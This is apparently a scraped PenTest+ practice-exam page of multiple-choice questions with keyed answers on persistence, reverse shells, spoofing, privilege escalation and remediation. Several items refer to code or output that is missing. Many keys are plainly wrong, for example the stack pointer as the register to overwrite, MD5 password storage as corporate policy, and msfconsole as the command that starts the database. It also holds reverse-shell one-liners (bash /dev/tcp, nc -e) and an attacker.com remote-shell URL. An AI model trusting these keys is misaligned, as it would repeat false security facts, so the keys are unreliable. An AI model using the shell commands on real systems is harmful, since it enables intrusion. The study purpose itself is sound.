CompTIA PenTest+ Certified for Cybersecurity Professionals Set 2

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?


Options are :

  • ICS vendors are slow to implement adequate security controls.
  • ICS staff are not adequately trained to perform basic duties. (Correct)
  • There is a scarcity of replacement equipment for critical devices.
  • There is a lack of compliance for ICS facilities.

Answer : ICS staff are not adequately trained to perform basic duties.

A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence on the device? (Select TWO.)


Options are :

  • Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1. (Correct)
  • Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com.
  • Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1. (Correct)
  • Create a fake service in Windows called RTAudio to execute manually.
  • Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio.
  • Create a scheduled task to call C:\windows\system32\drivers\etc\hosts.

Answer : Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.

Which of the following tools is used to perform a credential brute force attack?


Options are :

  • Hydra (Correct)
  • John the Ripper
  • Hashcat
  • Peach

Answer : Hydra

A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?


Options are :

  • Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.
  • Identify the issues that can be remediated most quickly and address them first.
  • Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities.
  • Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time. (Correct)

Answer : Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time.

Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?


Options are :

  • To remove the persistence (Correct)
  • To enable persistence
  • To report persistence
  • To check for persistence

Answer : To remove the persistence

A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?


Options are :

  • MAC address of the client
  • MAC address of the domain controller
  • MAC address of the web server
  • MAC address of the gateway (Correct)

Answer : MAC address of the gateway

Which of the following is an example of a spear phishing attack?


Options are :

  • Targeting an executive with an SMS attack (Correct)
  • Targeting a specific team with an email attack
  • Targeting random users with a USB key drop
  • Targeting an organization with a watering hole attack

Answer : Targeting an executive with an SMS attack

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?


Options are :

  • Sample SOAP messages
  • The REST API documentation
  • A protocol fuzzing utility
  • An applicable XSD file (Correct)

Answer : An applicable XSD file

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?


Options are :

  • Stack pointer register (Correct)
  • Index pointer register
  • Stack base pointer
  • Destination index register

Answer : Stack pointer register

Which of the following commands starts the Metasploit database?


Options are :

  • msfconsole (Correct)
  • workspace
  • msfvenom
  • db_init
  • db_connect

Answer : msfconsole

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO.)


Options are :

  • Convert to JAR. (Correct)
  • Decompile. (Correct)
  • Cross-compile the application.
  • Convert JAR files to DEX.
  • Re-sign the APK.
  • Attach to ADB.

Answer : Convert to JAR. Decompile.

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?


Options are :

  • Appendices
  • Executive summary (Correct)
  • Technical summary
  • Main body

Answer : Executive summary

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the code and output below:

Which of the following is the tester intending to do?


Options are :

  • Horizontally escalate privileges.
  • Scrape the page for hidden fields.
  • Analyze HTTP response code.
  • Search for HTTP headers. (Correct)

Answer : Search for HTTP headers.

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?


Options are :

  • From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal (Correct)
  • From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm
  • From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 xhost+; xterm
  • From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000

Answer : From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal

A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy:

Which of the following types of vulnerabilities is being exploited?


Options are :

  • Forced browsing vulnerability
  • Parameter pollution vulnerability
  • File upload vulnerability
  • Cookie enumeration (Correct)

Answer : Cookie enumeration

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?


Options are :

  • perl -e 'use SOCKET'; $i='; $p='443;
  • ssh superadmin@ -p 443
  • nc -e /bin/sh 443
  • bash -i >& /dev/tcp//443 0>&1 (Correct)

Answer : bash -i >& /dev/tcp//443 0>&1

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?


Options are :

  • Command injection attack
  • Clickjacking attack (Correct)
  • Directory traversal attack
  • Remote file inclusion attack

Answer : Clickjacking attack

During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?


Options are :

  • Disable the network port of the affected service. (Correct)
  • Complete all findings, and then submit them to the client.
  • Promptly alert the client with details of the finding.
  • Take the target offline so it cannot be exploited by an attacker.

Answer : Disable the network port of the affected service.

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled changepass.

-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using "strings" to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?


Options are :

  • Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.
  • Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path '/home/user/'. Then run changepass.
  • Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.
  • Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'. (Correct)

Answer : Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'.

A penetration tester wants to script out a way to discover all the PTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?


Options are :

  • nmap -p 53 -oG dnslist.txt | cut -d : -f 4 (Correct)
  • nslookup -ns 8.8.8.8 << dnslist.txt
  • for x in {1...254}; do dig -x 192.168.$x.$x; done
  • dig -r > echo 8.8.8.8 >> /etc/resolv.conf

Answer : nmap -p 53 -oG dnslist.txt | cut -d : -f 4

Given the following Python script:

Which of the following is where the output will go?


Options are :

  • To the screen
  • To a network server
  • To a file (Correct)
  • To /dev/null

Answer : To a file

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:


https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php


Which of the following remediation steps should be taken to prevent this type of attack?


Options are :

  • Implement a blacklist.
  • Block URL redirections. (Correct)
  • Double URL encode the parameters.
  • Stop external calls from the application.

Answer : Block URL redirections.

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?


Options are :

  • Discovery scan (Correct)
  • Stealth scan
  • Full scan
  • Credentialed scan

Answer : Discovery scan

A penetration tester is reviewing the following output from a wireless sniffer:

Which of the following can be extrapolated from the above information?


Options are :

  • Hardware vendor
  • Channel interference
  • Usernames (Correct)
  • Key strength

Answer : Usernames

A penetration tester reports that an Internet-facing application is only using basic authentication. Which of the following would be the BEST remediation strategy?


Options are :

  • Enable HTTP Strict Transport Security. (Correct)
  • Enable a secure cookie flag.
  • Encrypt the communication channel.
  • Sanitize invalid user input.

Answer : Enable HTTP Strict Transport Security.

Which of the following excerpts would come from a corporate policy?


Options are :

  • Employee passwords must contain a minimum of eight characters, with one being alphanumeric.
  • The help desk can be reached at 800-passwd1 to perform password resets.
  • Employees must use strong passwords for accessing corporate assets.
  • The corporate systems must store passwords using the MD5 hashing algorithm. (Correct)

Answer : The corporate systems must store passwords using the MD5 hashing algorithm.

While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?


Options are :

  • HKEY_CLASSES_ROOT
  • HKEY_LOCAL_MACHINE
  • HKEY_CURRENT_USER (Correct)
  • HKEY_CURRENT_CONFIG

Answer : HKEY_CURRENT_USER

A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?


Options are :

  • dsrm -users DN=company.com; OU=hq CN=users
  • dsuser -name -account -limit 3
  • dsquery user -inactive 3
  • dsquery -o -rdn -limit 21 (Correct)

Answer : dsquery -o -rdn -limit 21

Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?


Options are :

  • Creating a scope of the critical production systems
  • Setting a schedule of testing access times (Correct)
  • Establishing a white-box testing engagement
  • Having management sign off on intrusive testing

Answer : Setting a schedule of testing access times
